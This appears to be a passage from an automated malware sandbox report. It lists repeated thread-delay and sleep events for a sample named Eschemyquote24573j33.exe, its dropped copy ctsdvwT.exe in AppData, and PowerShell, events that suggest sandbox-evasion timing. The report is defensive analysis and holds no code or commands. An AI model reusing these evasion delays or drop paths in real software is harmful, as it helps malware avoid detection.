                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399874Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398911Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398754Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398641Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398516Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398406Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398296Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398187Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398077Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397969Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397859Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397750Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397637Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397416Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397312Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397093Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396984Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396218Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395672Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395557Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395016Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394797Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394683Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394574Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394468Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394245Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399890
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399765
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399656
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399546
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399403
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399296
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399185
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399077
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398969
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398859
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398750
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398640
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398530
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398422
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398312
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398201
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398093
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397984
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397875
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397765
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397656
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397547
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397435
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397328
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397218
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397104
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397000
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396845
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396719
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396594
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396481
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396375
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396258
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396156
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396047
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395937
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395828
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395719
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395594
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395484
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395375
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395266
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395156
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395047
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394937
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394828
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394719
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394609
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394500
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394391
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6314Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3398Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeWindow / User API: threadDelayed 3470Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeWindow / User API: threadDelayed 6380Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 3249Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 6607Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 4657
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 5193
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 3948Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2672Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep count: 38 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2400000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 3176Thread sleep count: 3470 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2399875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 3176Thread sleep count: 6380 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2399765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2399654s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2399546s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2399431s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2399327s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2399216s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2399109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2399000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2398890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2398780s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2398671s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2398562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2398451s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2398343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2398234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2398125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2397955s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2397750s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2397637s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2397529s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2397389s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2397281s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2397171s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2397059s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2396953s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2396843s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2396734s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2396625s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2396515s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2396406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2396296s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2396187s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2396078s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2395968s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2395859s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2395750s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2395640s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2395531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2395421s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2395282s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2395164s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2395052s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2394937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2394828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2394718s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2394607s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2394500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2394390s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940Thread sleep time: -2394281s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5500Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep count: 38 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2400000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2399874s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6772Thread sleep count: 3249 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6772Thread sleep count: 6607 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2399766s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2399656s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2399547s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2399437s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2399328s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2399219s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2398911s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2398754s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2398641s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2398516s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2398406s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2398296s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2398187s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2398077s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2397969s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2397859s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2397750s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2397637s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2397531s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2397416s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2397312s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2397203s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2397093s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2396984s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2396875s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2396766s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2396656s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2396547s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2396437s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2396328s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2396218s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2396109s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2396000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2395891s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2395781s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2395672s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2395557s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2395453s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2395343s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2395234s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2395125s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2395016s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2394906s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2394797s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2394683s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2394574s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2394468s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2394359s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668Thread sleep time: -2394245s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 3576Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep count: 37 > 30
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -34126476536362649s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2400000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5832Thread sleep count: 4657 > 30
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2399890s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2399765s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2399656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5832Thread sleep count: 5193 > 30
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2399546s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2399403s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2399296s >= -30000s
